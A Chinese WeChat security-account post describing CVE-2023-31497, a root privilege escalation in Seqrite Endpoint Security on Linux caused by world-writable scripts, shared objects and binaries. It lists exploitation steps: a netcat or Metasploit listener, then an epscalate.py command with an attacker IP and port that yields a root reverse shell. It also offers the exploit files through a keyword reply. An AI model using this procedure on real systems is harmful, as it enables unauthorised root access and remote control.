现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
漏洞简介
该漏洞的 CVE ID 为 CVE-2023-31497,已在所有基于 Debian 和 Ubuntu 的变体操作系统上进行了测试。
供应商和产品详细信息
卖方: Quick Heal Technologies Limited
产品:Seqrite 端点安全(EPS)
产品主页:https: //www.seqrite.com/endpoint-security/seqrite-endpoint-security
受影响的版本:影响 v8.0 之前的所有版本。
漏洞详情
该漏洞利用软件引入的 2 个不同漏洞来提升系统权限。首先,应用程序使用脚本来/etc/init.d/启动其扫描过程,任何用户都可以写入该脚本。其次,应用程序使用共享对象在运行时动态加载位置无关代码 (PIC)。事实上,所有可执行的共享目标文件都是全局可写的。最后,用于守护进程的应用程序二进制文件是世界可写的,这基本上意味着任何非特权用户都可以使用反向 shell 二进制文件覆盖扫描程序二进制文件以执行任意代码,如root.
漏洞利用
在攻击者机器上,使用netcat(nc -lvp <port>)或metasploit(multi/handler)启动监听器。
epscalate.py将和文件复制/下载shellcode.c到目标系统上。
使用适当的参数( )运行python文件python3 epscalate.py -H 192.168.0.103:9999 -I。
等待AV重新加载/系统重新启动。
与您的侦听器的反向连接可以确认代码以root身份执行。
下载地址
点击下方名片进入公众号
回复关键字【31497】获取下载链接
关 注 有 礼
推 荐 阅 读